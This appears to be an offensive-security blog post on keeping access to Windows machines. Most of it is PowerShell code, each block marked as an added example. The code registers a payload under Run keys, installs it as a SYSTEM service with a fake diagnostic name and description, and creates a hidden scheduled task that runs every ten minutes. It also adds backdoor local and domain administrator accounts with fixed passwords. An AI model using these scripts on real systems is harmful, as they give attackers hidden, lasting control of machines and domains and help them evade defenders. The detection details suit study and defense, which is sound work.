Persistence on Windows

In this post, we will describe some persistence techniques on Windows boxes.

Registry key

Some registry keys, such as Run, let you list programs that Windows starts automatically. Each value under the key is a REG_SZ whose data is the command line to execute.

There are two instances of the Run registry key:

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run: programs listed here start every time the current user logs on.
  • HKLM\Software\Microsoft\Windows\CurrentVersion\Run: programs listed here start every time any user logs on to the computer.

The first instance only requires the privileges of the current user; the second can only be written by users with administrative privileges (an elevated token when UAC is enabled). Both are among the first places a defender or an autoruns-style tool looks, so expect them to be audited.

Let’s launch C:\Windows\agent.exe at each logon:
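The Run-key step in PowerShell, as an added example that is not the original post's code. The payload path C:\Windows\agent.exe is the post's; the value name Agent and the elevation check are assumptions made for the example.

```powershell
# Added example: register C:\Windows\agent.exe under the Run key.
# The path is the post's; the value name "Agent" is an arbitrary choice.
$Payload = 'C:\Windows\agent.exe'
$Name    = 'Agent'
$RunKey  = 'Software\Microsoft\Windows\CurrentVersion\Run'

# Per-user instance: runs at every logon of the current user, no elevation needed.
Set-ItemProperty -Path "HKCU:\$RunKey" -Name $Name -Value $Payload -Type String

# Machine-wide instance: runs at every logon of any user. Writing it needs an
# elevated (administrator) token, so check first instead of failing half-way.
$Identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
$Principal = New-Object Security.Principal.WindowsPrincipal($Identity)
$IsAdmin   = $Principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)

if ($IsAdmin) {
    Set-ItemProperty -Path "HKLM:\$RunKey" -Name $Name -Value $Payload -Type String
} else {
    Write-Warning 'Not elevated: HKLM Run value not written'
}

# Verify both hives (this is also what a defender enumerates when hunting
# for Run-key persistence).
foreach ($Hive in 'HKCU', 'HKLM') {
    "--- ${Hive}:\$RunKey ---"
    Get-ItemProperty -Path "${Hive}:\$RunKey" |
        Select-Object -Property * -ExcludeProperty PS* |
        Format-List
}

# Equivalent with reg.exe from a plain cmd shell:
#   reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Agent /t REG_SZ /d C:\Windows\agent.exe /f
```

Set-ItemProperty creates the value when it does not exist yet, so the same line serves for both the initial install and an update of the command line.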

System Service

Services are programs that the Service Control Manager (SCM) starts, at boot for those with an Automatic start type. Unless another account is given when the service is created, a service runs as LocalSystem (NT AUTHORITY\SYSTEM), the most privileged local account. Creating a service requires administrative privileges. One caveat: the SCM expects the binary to implement the service control protocol; a plain executable that never reports a Running status is terminated after about 30 seconds and the start fails with error 1053.

Example:
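Installing the post's agent as an auto-start service, as an added example that is not the original post's code. The service name AgentSvc, its display name and description are assumptions; the binary path is the post's.

```powershell
# Added example: install C:\Windows\agent.exe as an auto-start service.
# Service name "AgentSvc", display name and description are arbitrary choices.
# Requires an elevated token.
$Binary = 'C:\Windows\agent.exe'
$Svc    = 'AgentSvc'

# sc.exe needs the space after each "key=". Without "obj=" the service runs as
# LocalSystem (NT AUTHORITY\SYSTEM); "start= auto" makes the SCM start it at boot.
sc.exe create $Svc binPath= $Binary start= auto DisplayName= "Windows Agent Service"
sc.exe description $Svc "Collects diagnostic data for Windows components."
sc.exe start $Svc

# Same thing with the built-in cmdlets:
#   New-Service -Name $Svc -BinaryPathName $Binary -StartupType Automatic
#   Start-Service -Name $Svc

# If the payload is not a real service binary, the SCM kills it after ~30 s
# (error 1053). A commonly used workaround is to let cmd.exe spawn it and exit:
#   sc.exe create $Svc binPath= "cmd.exe /c start C:\Windows\agent.exe" start= auto
# "sc start" still reports 1053, but the detached child survives.

# Verify: StartName shows the account the service runs as.
Get-CimInstance -ClassName Win32_Service -Filter "Name='$Svc'" |
    Select-Object -Property Name, State, StartMode, StartName, PathName
```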

Scheduled tasks

Scheduled tasks are executed by the Task Scheduler when a trigger fires: a time or repetition interval, boot, logon, idle, or an event. A task that runs as the current user can be registered without elevation; running it as SYSTEM or as another user requires administrative privileges.
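A task that fires at logon and then every ten minutes, as an added example that is not the original post's code. The task name AgentUpdate, the interval and the SYSTEM-or-current-user choice are assumptions; the binary path is the post's.

```powershell
# Added example: run C:\Windows\agent.exe at every logon and every 10 minutes
# thereafter. Task name "AgentUpdate" is an arbitrary choice.
$Binary = 'C:\Windows\agent.exe'
$Task   = 'AgentUpdate'

$Action   = New-ScheduledTaskAction -Execute $Binary
$Triggers = @(
    New-ScheduledTaskTrigger -AtLogOn
    # Older versions of the ScheduledTasks module also require -RepetitionDuration.
    New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 10)
)

# -Hidden keeps the task out of the default Task Scheduler view; the battery
# settings stop it from being skipped or stopped on laptops.
$Settings = New-ScheduledTaskSettingsSet -Hidden -StartWhenAvailable `
    -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries

$Identity = [Security.Principal.WindowsIdentity]::GetCurrent()
$IsAdmin  = (New-Object Security.Principal.WindowsPrincipal($Identity)).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)

if ($IsAdmin) {
    # Elevated: run as SYSTEM regardless of who is logged on.
    $Principal = New-ScheduledTaskPrincipal -UserId 'SYSTEM' -LogonType ServiceAccount -RunLevel Highest
} else {
    # Not elevated: a task as ourselves still works, at our own privilege level.
    $Principal = New-ScheduledTaskPrincipal -UserId $Identity.Name -LogonType Interactive
}

Register-ScheduledTask -TaskName $Task -Action $Action -Trigger $Triggers `
    -Settings $Settings -Principal $Principal -Force | Out-Null

# Verify: LastRunTime / NextRunTime show whether the task actually fires.
Get-ScheduledTask -TaskName $Task | Get-ScheduledTaskInfo

# Equivalent with schtasks.exe (works on hosts without the ScheduledTasks module):
#   schtasks /Create /F /TN AgentUpdate /TR C:\Windows\agent.exe /SC MINUTE /MO 10 /RU SYSTEM
```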

Add user

Adding a Windows user is a simple yet effective way to maintain our access. Adding a user requires administrative privileges, and it is noisy: the account shows up in net user output and generates Security log events 4720 (user account created) and 4732 or 4728 (member added to a security-enabled local or global group).

Adding a local administrator

Adding a new local administrator “admin” with password “s3crEt”.

The local administrators group’s name changes with the system’s language (e.g. “Administrateurs” in French). Its SID, S-1-5-32-544, does not, so resolving the group by SID works on any installation.
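Creating the local administrator with the post's credentials, as an added example that is not the original post's code. The user name admin and password s3crEt are the post's; the description string and the SID-based group lookup are assumptions made for the example.

```powershell
# Added example: create local user "admin" / "s3crEt" (the post's values) and
# put it in the built-in Administrators group. The group is resolved from its
# well-known SID, so the same script works on a French, German, ... install.
# Requires an elevated token.
$User = 'admin'
$Pass = ConvertTo-SecureString -String 's3crEt' -AsPlainText -Force

New-LocalUser -Name $User -Password $Pass -PasswordNeverExpires `
    -AccountNeverExpires -Description 'Maintenance account' | Out-Null

# S-1-5-32-544 is BUILTIN\Administrators on every Windows installation.
$Admins = Get-LocalGroup -SID 'S-1-5-32-544'
Add-LocalGroupMember -Group $Admins -Member $User

# Verify with the cmdlets.
Get-LocalGroupMember -Group $Admins | Select-Object -Property Name, PrincipalSource

# The classic tools need the localized group name ("Administrators",
# "Administrateurs", "Administratoren", ...). Translating the SID gives it.
$Sid       = New-Object Security.Principal.SecurityIdentifier 'S-1-5-32-544'
$GroupName = $Sid.Translate([Security.Principal.NTAccount]).Value.Split('\')[-1]
net localgroup $GroupName

# Equivalent creation with net.exe instead of the cmdlets above:
#   net user admin s3crEt /add
#   net localgroup $GroupName admin /add
```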

Adding a domain administrator

If we have domain administration privileges, we can add another domain administrator:
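Adding a second domain administrator, as an added example that is not the original post's code. It assumes a domain-joined host with the RSAT ActiveDirectory module and a Domain Admin token; the user name svc-maint, its password and description are assumptions.

```powershell
# Added example: run on a domain-joined host with a Domain Admin token, using
# the ActiveDirectory module from RSAT. User name and password are arbitrary.
Import-Module ActiveDirectory

$User = 'svc-maint'
$Pass = ConvertTo-SecureString -String 'Winter2024!Maint' -AsPlainText -Force

New-ADUser -Name $User -SamAccountName $User -AccountPassword $Pass `
    -Enabled $true -PasswordNeverExpires $true -Description 'Maintenance account'

# "Domain Admins" is the well-known RID 512 under the domain SID; resolving it
# this way avoids the localized group name ("Admins du domaine" on a French DC).
$DomainSid    = (Get-ADDomain).DomainSID.Value
$DomainAdmins = Get-ADGroup -Identity "$DomainSid-512"
Add-ADGroupMember -Identity $DomainAdmins -Members $User

# Verify.
Get-ADGroupMember -Identity $DomainAdmins | Select-Object -Property SamAccountName, objectClass

# Without RSAT, from any domain member (group name must match the DC's language):
#   net user svc-maint Winter2024!Maint /add /domain
#   net group "Domain Admins" svc-maint /add /domain
```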
